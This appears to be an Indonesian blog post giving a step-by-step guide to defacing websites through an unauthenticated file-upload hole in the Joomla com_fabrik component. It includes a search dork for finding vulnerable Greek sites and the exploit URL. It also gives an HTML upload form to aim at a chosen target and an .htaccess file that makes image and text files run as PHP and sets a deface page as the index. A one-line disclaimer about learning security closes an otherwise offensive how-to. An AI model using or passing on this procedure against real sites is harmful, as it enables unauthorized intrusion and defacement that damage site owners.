Deface Poc Com_fabrik Fresh 2022

0

Com_fabrik adalah salah satu metode lama yang memungkinkan script diunggah ke halaman utama secara instan. Untuk menggunakan metode ini, kamu dapat mencari target dengan menggunakan dork "inurl:/com_fabrik site:gr".

Setelah menemukan target, kamu dapat mencoba untuk melakukan exploit dengan mengakses index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload. Jika berhasil, kamu akan melihat hasil seperti pada gambar.

Selanjutnya, kamu dapat membuat script csrf dengan menyalin kode berikut:


<form method="POST" action="http://webkalian.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">

<input type="file" name="file">

<button>Hajarr</button>

</form>

<Font Color="green" Face="courier new"><font size="8">CSRF www.nts-7.net</h1><br><br>


Pastikan untuk mengganti "webkalian.com" dengan target yang telah kamu temukan.

Setelah itu, kamu dapat mengunggah script dengan mengubah ekstensinya menjadi .htm atau .htcsss. Namun, jika ingin menggunakan ekstensi .htaccess, kamu perlu membuat file .htaccess terlebih dahulu dengan isi sebagai berikut:


#Alternate default index page

DirectoryIndex nts7.htm

AddType application/x-httpd-php .png

AddType application/x-httpd-php .txt

AddType application/x-httpd-php .fla


Kamu dapat mengganti nts7.htm dengan nama script yang ingin kamu gunakan. Setelah itu, upload file .htaccess ke target dan klik "hajar". Jika berhasil, kamu akan melihat hasil seperti pada gambar.

Sekarang kamu sudah selesai, dan dapat mengakses indexnya. Ingat, Sebaiknya gunakan pengetahuan ini untuk mempelajari dan meningkatkan keamanan website.

Post a Comment

0Comments

Berkomentar dengan bijak dan sopan adalah salah satu cara agar cepat direspon oleh admin

Post a Comment (0)